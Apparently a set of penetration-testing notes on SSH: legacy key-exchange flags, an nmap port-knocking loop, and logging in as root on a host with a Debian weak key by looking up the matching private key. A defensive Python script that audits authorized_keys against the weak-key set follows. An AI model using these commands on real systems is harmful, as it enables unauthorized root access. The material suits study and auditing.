no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Solution:
ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
# To SSH using a DSA private key, add to /etc/ssh/ssh_config:
PubkeyAcceptedKeyTypes +ssh-dss
Port Knock
for i in 571 5292 291;do nmap -Pn --host-timeout 201 --max-retries 0 -p $i <IP>; done
$ ssh-keygen -l -f targetkey.pub
2048 c6:7b:14:fa:ae:b6:89:e6:67:17:ee:04:17:b0:ec:4e targetkey.pub
If we look at the public key in an editor, we can also infer that the key type is RSA. In order to locate the private key for this public key, we need to extract the data files, and look for a file named:
rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670
In the example above, the fingerprint is represented in hexadecimal with the colons removed, and the process ID is indicated as "26670". If we want to authenticate to a vulnerable system that uses this public key for authentication, we would run the following command:
$ ssh -i rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670 root@targetmachine
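The same naming scheme can be used to audit your own hosts. The following Python is an added example, not part of the original notes: it derives the `type/bits/fingerprint` name described above for each key in an `authorized_keys` file and reports any that match a file name from the extracted data set. The function names and the sample key are constructed for illustration, and only ssh-rsa and ssh-dss lines are handled.

```python
import base64, hashlib, struct

def _fields(blob):
    """Split an SSH wire-format blob into its length-prefixed fields."""
    out, off = [], 0
    while off < len(blob):
        (n,) = struct.unpack_from(">I", blob, off)
        out.append(blob[off + 4:off + 4 + n])
        off += 4 + n
    return out

def lookup_name(pubkey_line):
    """Map an ssh-rsa/ssh-dss key line to '<type>/<bits>/<md5 hex, no colons>'."""
    tokens = pubkey_line.split()
    idx = next(i for i, t in enumerate(tokens) if t in ("ssh-rsa", "ssh-dss"))
    blob = base64.b64decode(tokens[idx + 1])
    parts = _fields(blob)
    # RSA blob: type, e, n (size = n). DSA blob: type, p, q, g, y (size = p).
    kind, size = ("rsa", parts[2]) if parts[0] == b"ssh-rsa" else ("dsa", parts[1])
    bits = int.from_bytes(size, "big").bit_length()
    return f"{kind}/{bits}/{hashlib.md5(blob).hexdigest()}"

def audit(authorized_keys_text, weak_files):
    """Return (line_no, data_file) for each key present in the weak-key data set."""
    index = {f.rsplit("-", 1)[0]: f for f in weak_files}  # drop the '-<pid>' suffix
    hits = []
    for no, line in enumerate(authorized_keys_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        try:
            name = lookup_name(line)
        except (StopIteration, ValueError, IndexError, struct.error):
            continue  # unsupported key type or malformed line
        if name in index:
            hits.append((no, index[name]))
    return hits

def constructed_key(n, comment):
    """Build a well-formed ssh-rsa line from a made-up modulus (sample data only)."""
    def s(b): return struct.pack(">I", len(b)) + b
    def mpint(x): return s(x.to_bytes(x.bit_length() // 8 + 1, "big"))
    blob = s(b"ssh-rsa") + mpint(65537) + mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"

if __name__ == "__main__":
    weak = constructed_key((1 << 2047) | 1, "constructed-weak")
    files = [lookup_name(weak) + "-26670"]  # constructed stand-in for a data file name
    print(audit("# demo\n" + weak + "\n", files))
```

Current OpenSSH releases print SHA256 fingerprints by default; `ssh-keygen -E md5 -l -f targetkey.pub` prints the colon-separated MD5 form shown above.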